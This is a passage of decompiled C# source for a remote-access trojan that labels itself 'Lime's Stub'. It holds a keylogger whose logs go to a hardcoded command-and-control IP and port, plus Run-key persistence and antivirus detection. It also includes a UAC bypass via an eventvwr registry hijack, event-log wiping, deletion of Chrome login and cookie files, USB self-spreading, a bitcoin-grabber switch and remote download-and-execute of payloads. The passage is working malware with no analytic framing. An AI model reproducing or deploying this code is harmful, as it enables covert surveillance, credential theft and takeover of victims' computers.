IL_0144*/; } if (num3 != 0) { ProjectData.ClearProjectError(); } return; IL_017e: throw ProjectData.CreateProjectError(-2146828237); } public static void HideIt(string TorrentClient) { int num = default(int); int num3 = default(int); try { goto IL_0002; IL_0002: ProjectData.ClearProjectError(); num = -2; goto IL_000b; IL_000b: int num2 = 2; Thread.Sleep(1000); goto IL_0018; IL_0018: num2 = 3; Process[] processesByName = Process.GetProcessesByName(TorrentClient); goto IL_0021; IL_0021: num2 = 4; Torrent.ShowWindow(processesByName[0].MainWindowHandle.ToInt32(), 0); goto end_IL_0001; IL_003d: int num4 = num3 + 1; num3 = 0; switch (num4) { case 5: goto end_IL_0001; case 1: goto IL_0002; case 2: goto IL_000b; case 3: goto IL_0018; case 4: goto IL_0021; default: goto IL_009b; } IL_0061: num3 = num2; if (num > -2) { goto IL_006b; } goto IL_0068; IL_0068: int num5 = 1; goto IL_006c; IL_006b: num5 = num; goto IL_006c; IL_006c: switch (num5) { case 1: goto IL_003d; default: goto IL_009b; } end_IL_0001:; } catch (object obj) when (obj is Exception & num != 0 & num3 == 0) { ProjectData.SetProjectError((Exception)obj); /*Error near IL_0099: Could not find block for branch target IL_0061*/; } if (num3 != 0) { ProjectData.ClearProjectError(); } return; IL_009b: throw ProjectData.CreateProjectError(-2146828237); } } // j.A using j; using System; public class A { [STAThread] public static void main() { OK.ko(); } } // j.kl using j; using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.Diagnostics; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Windows.Forms; public class kl { private string LastAS; private int LastAV; private Keys lastKey; public string Logs; public string vn; public kl() { this.lastKey = Keys.None; this.Logs = ""; this.vn = "[kl]"; } private string AV() { try { IntPtr foregroundWindow = OK.GetForegroundWindow(); int processId = default(int); kl.GetWindowThreadProcessId(foregroundWindow, ref processId); Process processById = Process.GetProcessById(processId); if (!((foregroundWindow.ToInt32() == this.LastAV & Operators.CompareString(this.LastAS, processById.MainWindowTitle, false) == 0) | processById.MainWindowTitle.Length == 0)) { this.LastAV = foregroundWindow.ToInt32(); this.LastAS = processById.MainWindowTitle; return "\r\n\u0001" + DateAndTime.Now.ToString("yy/MM/dd ") + processById.ProcessName + " " + this.LastAS + "\u0001\r\n"; } } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return ""; } private string Fix(Keys k) { bool flag = OK.F.Keyboard.ShiftKeyDown; if (OK.F.Keyboard.CapsLock) { flag = (!flag && true); } string result; try { Keys keys = k; if (keys <= Keys.End) { if (keys <= Keys.Return) { switch (keys) { case Keys.Back: break; case Keys.Return: goto IL_0115; case Keys.Tab: return "[TAP]\r\n"; default: goto IL_014f; } goto IL_00da; } if ((uint)(keys - 16) > 1u) { switch (keys) { case Keys.End: break; case Keys.Space: return " "; default: goto IL_014f; } } } else { if (keys <= Keys.RControlKey) { if (keys != Keys.Delete) { if ((uint)(keys - 112) > 11u && (uint)(keys - 160) > 3u) { goto IL_014f; } goto IL_00fd; } goto IL_00da; } if (keys != Keys.Shift && keys != Keys.Control && keys != Keys.Alt) { goto IL_014f; } } goto IL_00fd; IL_014f: checked { if (flag) { return kl.VKCodeToUnicode((uint)k).ToUpper(); } result = kl.VKCodeToUnicode((uint)k); goto end_IL_0036; } IL_00da: return "[" + k.ToString() + "]"; IL_0115: if (this.Logs.EndsWith("[ENTER]\r\n")) { return ""; } return "[ENTER]\r\n"; IL_00fd: return ""; end_IL_0036:; } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; char c; if (flag) { c = Strings.ChrW((int)k); result = c.ToString().ToUpper(); ProjectData.ClearProjectError(); string result2 = result; ProjectData.ClearProjectError(); return result2; } c = Strings.ChrW((int)k); result = c.ToString().ToLower(); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return result; } [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] private static extern short GetAsyncKeyState(int a); [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] private static extern int GetKeyboardLayout(int a); [DllImport("user32.dll")] private static extern bool GetKeyboardState(byte[] a); [DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] private static extern int GetWindowThreadProcessId(IntPtr a, ref int b); [DllImport("user32.dll")] private static extern uint MapVirtualKey(uint a, uint b); [DllImport("user32.dll")] private static extern int ToUnicodeEx(uint a, uint b, byte[] c, [Out] [MarshalAs(UnmanagedType.LPWStr)] StringBuilder d, int e, uint f, IntPtr g); private static string VKCodeToUnicode(uint a) { try { StringBuilder stringBuilder = new StringBuilder(); byte[] array = new byte[255]; if (!kl.GetKeyboardState(array)) { return ""; } uint b = kl.MapVirtualKey(a, 0u); int num = 0; IntPtr g = (IntPtr)kl.GetKeyboardLayout(kl.GetWindowThreadProcessId(OK.GetForegroundWindow(), ref num)); kl.ToUnicodeEx(a, b, array, stringBuilder, 5, 0u, g); return stringBuilder.ToString(); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return ((Enum)checked((int)a)).ToString(); } public void WRK() { this.Logs = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV(this.vn, ""))); checked { try { int num = 0; while (true) { num++; int num2 = 0; do { if (kl.GetAsyncKeyState(num2) == -32767 & !OK.F.Keyboard.CtrlKeyDown) { Keys k = unchecked((Keys)num2); string text = this.Fix(k); if (text.Length > 0) { this.Logs += this.AV(); this.Logs += text; } this.lastKey = k; } num2++; } while (num2 <= 255); if (num == 1000) { num = 0; int num3 = Conversions.ToInteger("20") * 1024; if (this.Logs.Length > num3) { this.Logs = this.Logs.Remove(0, this.Logs.Length - num3); } OK.STV(this.vn, this.Logs, RegistryValueKind.String); } Thread.Sleep(1); } } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } } } // j.OK using j; using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.VisualBasic.Devices; using Microsoft.Win32; using My; using System; using System.Diagnostics; using System.Drawing; using System.Drawing.Imaging; using System.IO; using System.IO.Compression; using System.Net; using System.Net.Sockets; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Security.Principal; using System.Text; using System.Threading; using System.Windows.Forms; [StandardModule] internal sealed class OK { [Serializable] [CompilerGenerated] internal sealed class _Closure$__ { public static readonly _Closure$__ $I; public static ParameterizedThreadStart $IR26-1; static _Closure$__() { _Closure$__.$I = new _Closure$__(); } [DebuggerHidden] internal void _Lambda$__R26-1(object a0) { Clipboard.SetText(Conversions.ToString(a0)); } } public static string BTC_ADD = ""; public static bool BTC_EN = Conversions.ToBoolean("False"); public static string SLP = "0"; public static string TMOT = "10"; private static byte[] b = new byte[5121]; public static bool BD = Conversions.ToBoolean("False"); public static TcpClient C = null; public static bool Cn = false; public static string DR = "AppData"; public static string EXE = "Hardware.exe"; public static Computer F = new Computer(); public static FileStream FS; public static string H = "195.123.217.189"; public static bool Idr = Conversions.ToBoolean("True"); public static bool Anti_CH = Conversions.ToBoolean("False"); public static bool IsF = Conversions.ToBoolean("True"); public static bool USB_SP = Conversions.ToBoolean("False"); public static bool Isu = Conversions.ToBoolean("True"); public static kl kq = null; private static string lastcap = ""; public static FileInfo LO = new FileInfo(Assembly.GetEntryAssembly().Location); private static MemoryStream MeM = new MemoryStream(); public static object MT = null; public static string P = "10050"; public static object PLG = null; public static string RG = "Hardware.exe"; public static string sf = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; public static string VN = "Qk5FVC0="; public static string VR = "0.7.3"; public static string Y = "firefox"; public static bool BOT_KILL = Conversions.ToBoolean("False"); public static bool HIDE_ME = Conversions.ToBoolean("False"); public static bool Persis = Conversions.ToBoolean("True"); [CompilerGenerated] [DebuggerStepThrough] private static void _Lambda__1(object a0) { OK.Ind((byte[])a0); } [DebuggerStepThrough] [CompilerGenerated] private static void _Lambda__2(object a0, SessionEndingEventArgs a1) { OK.ED(); } public static string ACT() { string result; try { IntPtr foregroundWindow = OK.GetForegroundWindow(); if (foregroundWindow == IntPtr.Zero) { return ""; } string text = Strings.Space(checked(OK.GetWindowTextLength((long)foregroundWindow) + 1)); OK.GetWindowText(foregroundWindow, ref text, text.Length); result = OK.ENB(ref text); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; result = ""; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return result; } public static string BS(ref byte[] B) { return Encoding.UTF8.GetString(B); } public static bool Cam() { checked { try { int num = 0; do { string text = null; short wDriver = (short)num; string text2 = Strings.Space(100); if (OK.capGetDriverDescriptionA(wDriver, ref text2, 100, ref text, 100)) { return true; } num++; } while (num <= 4); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return false; } } [DllImport("avicap32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] public static extern bool capGetDriverDescriptionA(short wDriver, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVer, int cbVer); private static bool CompDir(FileInfo F1, FileInfo F2) { if (Operators.CompareString(F1.Name.ToLower(), F2.Name.ToLower(), false) == 0) { DirectoryInfo directoryInfo = F1.Directory; DirectoryInfo directoryInfo2 = F2.Directory; do { if (Operators.CompareString(directoryInfo.Name.ToLower(), directoryInfo2.Name.ToLower(), false) != 0) { return false; } directoryInfo = directoryInfo.Parent; directoryInfo2 = directoryInfo2.Parent; if (directoryInfo == null & directoryInfo2 == null) { return true; } if (directoryInfo == null) { return false; } } while (directoryInfo2 != null); } return false; } public static bool connect() { OK.Cn = false; Thread.Sleep(2000); FileInfo lO = OK.LO; lock (lO) { try { if (OK.C != null) { try { OK.C.Close(); OK.C = null; Thread.Sleep(checked((int)Math.Round(Math.Round(Math.Round(unchecked(Conversions.ToDouble(OK.TMOT) * 1000.0)))))); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } try { OK.MeM.Dispose(); } catch (Exception ex4) { ProjectData.SetProjectError(ex4); Exception ex5 = ex4; ProjectData.SetProjectError(ex5); Exception ex6 = ex5; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } catch (Exception ex7) { ProjectData.SetProjectError(ex7); Exception ex8 = ex7; ProjectData.SetProjectError(ex8); Exception ex9 = ex8; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { OK.MeM = new MemoryStream(); OK.C = new TcpClient(); OK.C.ReceiveBufferSize = 204800; OK.C.SendBufferSize = 204800; OK.C.Client.SendTimeout = 10000; OK.C.Client.ReceiveTimeout = 10000; OK.C.Connect(OK.H, Conversions.ToInteger(OK.P)); OK.Cn = true; OK.Send(OK.inf()); try { string text = default(string); if (Operators.ConditionalCompareObjectEqual(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")), "", false)) { text = text + OK.DEB(ref OK.VN) + "\r\n"; } else { string str = text; string text2 = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV("vn", ""))); text = str + OK.DEB(ref text2) + "\r\n"; } text = text + OK.H + ":" + OK.P + "\r\n" + OK.DR + "\r\n" + OK.EXE + "\r\n" + Conversions.ToString(OK.Idr) + "\r\n" + Conversions.ToString(OK.IsF) + "\r\n" + Conversions.ToString(OK.Isu) + "\r\n" + Conversions.ToString(OK.BD); OK.Send("inf" + OK.Y + OK.ENB(ref text)); } catch (Exception ex10) { ProjectData.SetProjectError(ex10); Exception ex11 = ex10; ProjectData.SetProjectError(ex11); Exception ex12 = ex11; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } catch (Exception ex13) { ProjectData.SetProjectError(ex13); Exception ex14 = ex13; ProjectData.SetProjectError(ex14); Exception ex15 = ex14; OK.Cn = false; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } return OK.Cn; } public static string DEB(ref string s) { byte[] array = Convert.FromBase64String(s); return OK.BS(ref array); } public static void DLV(string n) { try { OK.F.Registry.CurrentUser.OpenSubKey("Software\\" + OK.RG, true).DeleteValue(n); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } public static void ED() { OK.pr(0); } public static string ENB(ref string s) { return Convert.ToBase64String(OK.SB(ref s)); } [DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] public static extern IntPtr GetForegroundWindow(); [DllImport("kernel32", CharSet = CharSet.Ansi, EntryPoint = "GetVolumeInformationA", ExactSpelling = true, SetLastError = true)] private static extern int GetVolumeInformation([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpRootPathName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpVolumeNameBuffer, int nVolumeNameSize, ref int lpVolumeSerialNumber, ref int lpMaximumComponentLength, ref int lpFileSystemFlags, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileSystemNameBuffer, int nFileSystemNameSize); [DllImport("user32.dll", CharSet = CharSet.Ansi, EntryPoint = "GetWindowTextA", ExactSpelling = true, SetLastError = true)] public static extern int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength); public static string GetAntiVirus() { Process[] processes = Process.GetProcesses(); int num = 0; checked { string text; do { string processName = processes[num].ProcessName; text = ((Operators.CompareString(processName, "ekrn", false) != 0) ? ((Operators.CompareString(processName, "avgcc", false) != 0) ? ((Operators.CompareString(processName, "avgnt", false) != 0) ? ((Operators.CompareString(processName, "QHWatchdog", false) != 0) ? ((Operators.CompareString(processName, "ahnsd", false) != 0) ? ((Operators.CompareString(processName, "bdss", false) != 0) ? ((Operators.CompareString(processName, "bdv", false) != 0) ? ((Operators.CompareString(processName, "clamav", false) != 0) ? ((Operators.CompareString(processName, "fpavserver", false) != 0) ? ((Operators.CompareString(processName, "fssm32", false) != 0) ? ((Operators.CompareString(processName, "avkcl", false) != 0) ? ((Operators.CompareString(processName, "engface", false) != 0) ? ((Operators.CompareString(processName, "avp", false) != 0) ? ((Operators.CompareString(processName, "updaterui", false) != 0) ? ((Operators.CompareString(processName, "msmpeng", false) != 0) ? ((Operators.CompareString(processName, "zanda", false) != 0) ? ((Operators.CompareString(processName, "npupdate", false) != 0) ? ((Operators.CompareString(processName, "inicio", false) != 0) ? ((Operators.CompareString(processName, "sagui", false) != 0) ? ((Operators.CompareString(processName, "savservice", false) != 0) ? ((Operators.CompareString(processName, "saswinlo", false) != 0) ? ((Operators.CompareString(processName, "spbbcsvc", false) != 0) ? ((Operators.CompareString(processName, "thd32", false) != 0) ? ((Operators.CompareString(processName, "ufseagnt", false) != 0) ? ((Operators.CompareString(processName, "dllhook", false) != 0) ? ((Operators.CompareString(processName, "sbamtray", false) != 0) ? ((Operators.CompareString(processName, "vrmonsvc", false) != 0) ? ((Operators.CompareString(processName, "dllhook", false) != 0) ? ((Operators.CompareString(processName, "vbcalrt", false) != 0) ? ((Operators.CompareString(processName, "aswUpdSv", false) != 0) ? "Not Found" : "Avast") : "VirusBuster") : "VBA32") : "ViRobot") : "VIPRE") : "VBA32") : "TrendMicro") : "TheHacker") : "Symantec") : "SUPERAntiSpyware") : "Sophos") : "Prevx") : "Panda") : "nProtect") : "Norman") : "microsoft security essentials") : "McAfee") : "Kaspersky") : "Jiangmin") : "GData") : "F-Secure") : "F-Prot") : "ClamAV") : "ByteHero") : "BitDefender") : "AhnLab-V3") : "Total Security 360") : "Avira") : "AVG") : "NOD32"); int id = processes[num].Id; num++; } while (!(Operators.CompareString(text, "Not Found", false) != 0 | num > processes.Length - 1)); if (num > processes.Length - 1) { text = "Not Found"; } return text; } } [DllImport("user32.dll", CharSet = CharSet.Ansi, EntryPoint = "GetWindowTextLengthA", ExactSpelling = true, SetLastError = true)] public static extern int GetWindowTextLength(long hwnd); public static object GTV(string n, object ret) { object objectValue; try { objectValue = RuntimeHelpers.GetObjectValue(OK.F.Registry.CurrentUser.OpenSubKey("Software\\" + OK.RG).GetValue(n, RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(ret)))); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; objectValue = RuntimeHelpers.GetObjectValue(ret); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return objectValue; } public static string HWD() { string result; try { string text = null; int num = 0; int num2 = 0; string text2 = null; string text3 = Interaction.Environ("SystemDrive") + "\\"; int number = default(int); OK.GetVolumeInformation(ref text3, ref text, 0, ref number, ref num, ref num2, ref text2, 0); result = Conversion.Hex(number); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; result = "ERR"; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return result; } [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] public static extern long SwapMouseButton(long bSwap); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern void SendMessage(int hWnd, uint msg, uint wParam, int lparam); [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] private static extern int SetWindowPos(int hwnd, int hWndInsertAfter, int x, int y, int cx, int cy, int wFlags); [DllImport("user32", CharSet = CharSet.Ansi, EntryPoint = "FindWindowA", ExactSpelling = true, SetLastError = true)] private static extern int FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName); [DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public static void Ind(byte[] b) { string[] array = Strings.Split(OK.BS(ref b), OK.Y, -1, CompareMethod.Binary); try { string text = array[0]; switch (<PrivateImplementationDetails>.ComputeStringHash(text)) { case 1346747564u: if (Operators.CompareString(text, "seed", false) == 0) { Torrent.SeedTorrent(array[1]); } break; case 64384596u: if (Operators.CompareString(text, "delchrm", false) == 0) { try { Process[] processesByName = Process.GetProcessesByName("chrome"); Process[] array2 = processesByName; foreach (Process process in array2) { process.Kill(); } } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.ClearProjectError(); } Thread.Sleep(200); File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Login Data"); File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Cookies"); } break; case 1938327121u: if (Operators.CompareString(text, "GiveMeAdmin", false) == 0) { OK.pr(0); using (RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Classes\\mscfile\\shell\\open\\command")) { registryKey.SetValue("", Application.ExecutablePath, RegistryValueKind.String); } Process.Start("eventvwr.exe"); ProjectData.EndApp(); } break; case 3883927432u: if (Operators.CompareString(text, "BitcoinON", false) == 0) { if (!OK.BTC_EN) { OK.Send("MSG" + OK.Y + "BitcoinGrabber was not checked when stub created!"); return; } CallEveryXSeconds.Start(); } break; case 2356653186u: if (Operators.CompareString(text, "BitcoinOFF", false) == 0) { if (!OK.BTC_EN) { OK.Send("MSG" + OK.Y + "BitcoinGrabber was not checked when stub created!"); return; } CallEveryXSeconds.stopme(); } break; case 2113050452u: if (Operators.CompareString(text, "EventLogs", false) == 0) { object current4 = WindowsIdentity.GetCurrent(); object instance4 = new WindowsPrincipal((WindowsIdentity)current4); if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance4, null, "IsInRole", new object[1] { WindowsBuiltInRole.Administrator }, null, null, null))) { OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator"); } else { EventLog eventLog = new EventLog(); EventLog[] eventLogs = EventLog.GetEventLogs(); foreach (EventLog eventLog in eventLogs) { eventLog.Clear(); eventLog.Close(); } } } break; case 3968740937u: if (Operators.CompareString(text, "ShowBar", false) == 0) { string text4 = "Shell_traywnd"; string text5 = ""; int hwnd2 = OK.FindWindow(ref text4, ref text5); OK.SetWindowPos(hwnd2, 0, 0, 0, 0, 0, 64); } break; case 2054338866u: if (Operators.CompareString(text, "HideBar", false) == 0) { string text2 = "Shell_traywnd"; string text3 = ""; int hwnd = OK.FindWindow(ref text2, ref text3); OK.SetWindowPos(hwnd, 0, 0, 0, 0, 0, 128); } break; case 2317804999u: if (Operators.CompareString(text, "taskmgrOFF", false) == 0) { object current = WindowsIdentity.GetCurrent(); object instance = new WindowsPrincipal((WindowsIdentity)current); if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance, null, "IsInRole", new object[1] { WindowsBuiltInRole.Administrator }, null, null, null))) { OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator"); } else { MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord); } } break; case 718925475u: if (Operators.CompareString(text, "taskmgrON", false) == 0) { object current3 = WindowsIdentity.GetCurrent(); object instance3 = new WindowsPrincipal((WindowsIdentity)current3); if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance3, null, "IsInRole", new object[1] { WindowsBuiltInRole.Administrator }, null, null, null))) { OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator"); } else { MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "0", RegistryValueKind.DWord); } } break; case 3213366942u: if (Operators.CompareString(text, "EnableCMD", false) == 0) { object current2 = WindowsIdentity.GetCurrent(); object instance2 = new WindowsPrincipal((WindowsIdentity)current2); if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance2, null, "IsInRole", new object[1] { WindowsBuiltInRole.Administrator }, null, null, null))) { OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator"); } else { MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "0", RegistryValueKind.DWord); } } break; case 1700680649u: if (Operators.CompareString(text, "DisableCMD", false) == 0) { object current6 = WindowsIdentity.GetCurrent(); object instance6 = new WindowsPrincipal((WindowsIdentity)current6); if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance6, null, "IsInRole", new object[1] { WindowsBuiltInRole.Administrator }, null, null, null))) { OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator"); } else { MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "1", RegistryValueKind.DWord); } } break; case 3108627940u: if (Operators.CompareString(text, "MonitorON", false) == 0) { OK.SendMessage(-1, 274u, 61808u, -1); } break; case 557886142u: if (Operators.CompareString(text, "MonitorOFF", false) == 0) { OK.SendMessage(-1, 274u, 61808u, 2); } break; case 860096209u: if (Operators.CompareString(text, "NormalMouse", false) == 0) { OK.SwapMouseButton(0L); } break; case 2922144132u: if (Operators.CompareString(text, "ReverseMouse", false) == 0) { OK.SwapMouseButton(256L); } break; case 2576659495u: if (Operators.CompareString(text, "ClearClp", false) == 0) { Thread thread2 = new Thread(Clipboard.Clear); thread2.SetApartmentState(ApartmentState.STA); thread2.Start(); } break; case 3553460540u: if (Operators.CompareString(text, "SetClp", false) == 0) { Thread thread = new Thread((_Closure$__.$IR26-1 == null) ? (_Closure$__.$IR26-1 = delegate(object a0) { Clipboard.SetText(Conversions.ToString(a0)); }) : _Closure$__.$IR26-1); thread.SetApartmentState(ApartmentState.STA); thread.Start(array[1]); } break; case 601276870u: if (Operators.CompareString(text, "OpenWebpageHidden", false) == 0) { ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.FileName = "iexplore.exe"; processStartInfo.Arguments = array[1]; processStartInfo.CreateNoWindow = true; processStartInfo.ErrorDialog = false; processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; Process.Start(processStartInfo); } break; case 3642407086u: if (Operators.CompareString(text, "OpenWebpage", false) == 0) { Process.Start(array[1]); } break; case 4269631087u: if (Operators.CompareString(text, "BlockWebpage", false) == 0) { object current5 = WindowsIdentity.GetCurrent(); object instance5 = new WindowsPrincipal((WindowsIdentity)current5); if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance5, null, "IsInRole", new object[1] { WindowsBuiltInRole.Administrator }, null, null, null))) { OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator"); } else { MyProject.Computer.FileSystem.WriteAllText("C:\\WINDOWS\\system32\\drivers\\etc\\hosts", "\r\n127.0.0.1 " + array[1], true); } } break; case 989868607u: if (Operators.CompareString(text, "msgbox", false) == 0) { Interaction.MsgBox(array[1], MsgBoxStyle.Information, "Information"); } break; case 4171019001u: if (Operators.CompareString(text, "antiproc", false) == 0) { MyAntiProcess.AutoAnti(); MyAntiProcess.Start(); } break; case 2513567945u: if (Operators.CompareString(text, "antiprocstop", false) == 0) { MyAntiProcess.stopme(); MyAntiProcess.XAnti(); } break; case 2648296626u: if (Operators.CompareString(text, "spreadusbme", false) == 0) { try { string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles; string[] logicalDrives = Directory.GetLogicalDrives(); string[] array9 = logicalDrives; foreach (string programFiles in array9) { try { if (!File.Exists(programFiles + OK.RG)) { File.Copy(Assembly.GetExecutingAssembly().Location, programFiles + OK.RG); } } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } } catch (Exception projectError2) { ProjectData.SetProjectError(projectError2); ProjectData.ClearProjectError(); } } break; case 2052932546u: if (Operators.CompareString(text, "restartme", false) == 0) { Interaction.Shell("shutdown -r -t 00 -f", AppWinStyle.Hide, false, -1); } break; case 2502785813u: if (Operators.CompareString(text, "shutdownme", false) == 0) { Interaction.Shell("shutdown -s -t 00 -f", AppWinStyle.Hide, false, -1); } break; case 3917606159u: if (Operators.CompareString(text, "botk", false) == 0) { BotKillers.RunStandardBotKiller(); OK.Send("MSG" + OK.Y + "Ran Malware Killer"); } break; case 547083341u: if (Operators.CompareString(text, "TextToSpeech", false) == 0) { object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Interaction.CreateObject("SAPI.Spvoice", ""))); object objectValue2 = RuntimeHelpers.GetObjectValue(objectValue); Type type = null; string memberName = "speak"; object[] array3 = new object[1]; object[] array4 = array3; int num = 0; string[] array5 = array; string[] array6 = array5; int num2 = 1; array4[num] = array6[num2]; object[] array7 = array3; object[] arguments = array7; string[] argumentNames = null; Type[] typeArguments = null; bool[] array8 = new bool[1] { true }; NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(objectValue2), type, memberName, arguments, argumentNames, typeArguments, array8, true); if (array8[0]) { array5[num2] = Conversions.ToString(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(array7[0])), typeof(string))); } } break; case 1160889637u: if (Operators.CompareString(text, "ll", false) == 0) { OK.Cn = false; return; } break; case 1128069874u: if (Operators.CompareString(text, "kl", false) == 0) { OK.Send("kl" + OK.Y + OK.ENB(ref OK.kq.Logs)); return; } break; case 4013831322u: if (Operators.CompareString(text, "prof", false) == 0) { string left = array[1]; if (Operators.CompareString(left, "~", false) != 0) { if (Operators.CompareString(left, "!", false) != 0) { if (Operators.CompareString(left, "@", false) == 0) { OK.DLV(array[2]); } } else { OK.STV(array[2], array[3], RegistryValueKind.String); OK.Send(Conversions.ToString(RuntimeHelpers.GetObjectValue(Operators.ConcatenateObject("getvalue" + OK.Y + array[1] + OK.Y, RuntimeHelpers.GetObjectValue(OK.GTV(array[1], "")))))); } } else { OK.STV(array[2], array[3], RegistryValueKind.String); } return; } break; } checked { if (Operators.CompareString(text, "rn", false) == 0) { byte[] bytes; if (array[2][0] == '\u001f') { try { MemoryStream memoryStream = new MemoryStream(); int length = (array[0] + OK.Y + array[1] + OK.Y).Length; memoryStream.Write(b, length, b.Length - length); bytes = OK.ZIP(memoryStream.ToArray()); } catch (Exception ex3) { ProjectData.SetProjectError(ex3); Exception ex4 = ex3; ProjectData.SetProjectError(ex4); Exception ex5 = ex4; OK.Send("MSG" + OK.Y + "Execute ERROR"); OK.Send("bla"); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); return; } } else { WebClient webClient = new WebClient(); try { bytes = webClient.DownloadData(array[2]); } catch (Exception ex6) { ProjectData.SetProjectError(ex6); Exception ex7 = ex6; ProjectData.SetProjectError(ex7); Exception ex8 = ex7; OK.Send("MSG" + OK.Y + "Download ERROR"); OK.Send("bla"); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); return; } } OK.Send("bla"); string text6 = Path.GetTempFileName() + "." + array[1]; try { File.WriteAllBytes(text6, bytes); 